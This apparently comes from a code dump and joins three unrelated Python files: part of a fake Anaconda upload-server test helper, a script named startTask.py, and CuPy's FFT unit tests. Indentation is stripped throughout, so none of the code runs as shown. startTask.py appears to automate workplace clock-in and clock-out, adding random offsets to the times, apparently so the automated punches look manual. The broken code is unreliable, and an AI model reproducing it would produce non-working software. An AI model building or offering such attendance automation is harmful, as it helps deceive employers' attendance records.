monkeypatch.setattr('binstar_client.utils.config.get_config', _mock_get_config)
except Exception:
monkeypatch.setattr('binstar_client.utils.get_config', _mock_get_config)
class FakeServerContext(object):
def __init__(self, monkeypatch, fail_these, expected_basename):
self._monkeypatch = monkeypatch
self._fail_these = fail_these
self._expected_basename = expected_basename
self._url = None
self._loop = None
self._started = threading.Condition()
self._thread = threading.Thread(target=self._run)
def __exit__(self, type, value, traceback):
if self._loop is not None:
# we can ONLY use add_callback here, since the loop is
# running in a different thread.
self._loop.add_callback(self._stop)
self._thread.join()
def __enter__(self):
self._started.acquire()
self._thread.start()
self._started.wait()
self._started.release()
_monkeypatch_client_config(self._monkeypatch, self._url)
return self._url
def _run(self):
self._loop = IOLoop()
self._server = FakeAnacondaServer(fail_these=self._fail_these, expected_basename=self._expected_basename)
self._url = self._server.url
def notify_started():
self._started.acquire()
self._started.notify()
self._started.release()
self._loop.add_callback(notify_started)
self._loop.start()
# done
self._server.unlisten()
def _stop(self):
def really_stop():
if self._loop is not None:
self._loop.stop()
self._loop = None
# the delay allows pending next-tick things to go ahead
# and happen, which may avoid some problems with trying to
# output to stdout after pytest closes it
if self._loop is not None:
self._loop.call_later(delay=0.05, callback=really_stop)
def fake_server(monkeypatch, fail_these=(), expected_basename='nope'):
return FakeServerContext(monkeypatch, fail_these, expected_basename)
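# Illustrative sketch (assumed pytest-style usage, not part of this module):
# ``fake_server`` yields the base URL of the in-process Tornado server and
# patches anaconda-client to point at it. Names below are hypothetical.
#
#     def test_upload_fails_at_stage(monkeypatch):
#         with fake_server(monkeypatch, fail_these={'stage'},
#                          expected_basename='project.tar.bz2') as url:
#             ...  # exercise the uploader; the /stage endpoint now returns 501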
|
startTask.py
|
# -*- coding=utf-8 -*-
import datetime, time, random, threading
import config
from main.loadDriver import auto_activity
# Clock-in time (seconds since midnight), shifted a bit earlier at random
START_TIME = config.START_CLOCK_TIME - random.randint(1, config.FL_CLOCK_TIME)
# Clock-out time (seconds since midnight), shifted a bit later at random
OUT_TIME = config.OUT_CLOCK_TIME + random.randint(1, config.FL_CLOCK_TIME)
def count_time():
now = datetime.datetime.now()
now_sec = now.hour * 60 * 60 + now.minute * 60 + now.second
s = "距离上班打卡已过去:" + str(now_sec - START_TIME) if ((now_sec - START_TIME) > 0) else "距离上班打卡还有:" + str(
now_sec - START_TIME)
s += "s,"
s += "距离下班打卡已过去:" + str(OUT_TIME - now_sec) if ((OUT_TIME - now_sec) < 0) else "距离下班打卡还有:" + str(
OUT_TIME - now_sec)
s += "s"
print(s.replace("-", ""))
if 0 < (now_sec - START_TIME) < 30:
auto_activity()
return
elif 0 < (OUT_TIME - now_sec) < 30:
auto_activity()
return
def task():
while True:
count_time()
time.sleep(30)
def startTask():
    thread = threading.Thread(target=task)
    thread.start()
if __name__ == '__main__':
startTask()
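# Illustrative sketch of the ``config`` module this script expects (values are
# hypothetical). Times are seconds since midnight, matching ``now_sec`` above:
#
#     # config.py
#     START_CLOCK_TIME = 9 * 60 * 60   # 09:00 clock-in
#     OUT_CLOCK_TIME = 18 * 60 * 60    # 18:00 clock-out
#     FL_CLOCK_TIME = 10 * 60          # up to 10 minutes of random jitter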
|
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
from cupy.fft.fft import _default_fft_func, _fft, _fftn
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixtures in parallel
by passing the each element of ``dtypes`` to the named
argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
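# Usage sketch (the test classes below follow the same pattern): the decorator
# injects ``enable_nd`` and re-runs the test body for each planning state.
#
#     @nd_planning_states()
#     @testing.for_all_dtypes()
#     def test_something(self, dtype, enable_nd):
#         assert config.enable_nd_planning == enable_nd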
def multi_gpu_config(gpu_configs=None):
"""Decorator for parameterized tests with different GPU configurations.
Args:
gpu_configs(list of list): The GPUs to test.
    .. note::
The decorated tests are skipped if no or only one GPU is available.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
use_multi_gpus = config.use_multi_gpus
_devices = config._devices
try:
for gpus in gpu_configs:
try:
nGPUs = len(gpus)
assert nGPUs >= 2, 'Must use at least two gpus'
config.use_multi_gpus = True
config.set_cufft_gpus(gpus)
impl(self, *args, **kw)
except Exception:
print('GPU config is:', gpus)
raise
finally:
config.use_multi_gpus = use_multi_gpus
config._devices = _devices
return test_func
return decorator
def _size_last_transform_axis(shape, s, axes):
if s is not None:
if s[-1] is not None:
return s[-1]
elif axes is not None:
return shape[axes[-1]]
return shape[-1]
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
    # NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
        # np.fft.fft always returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
# Almost identical to the TestFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'n': [None, 0, 64],
'shape': [(64,), (4, 64)],
'norm': [None, 'ortho', ''],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuFft(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
    # NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
# Almost identical to the TestFftOrder class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuFftOrder(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
# Almost identical to the TestPlanCtxManagerFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'n': [None, 64],
'shape': [(64,), (128,)],
'norm': [None, 'ortho'],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuPlanCtxManagerFft(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
        # np.fft.fft always returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(4*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfft2EmptyAxes(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
def test_rfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
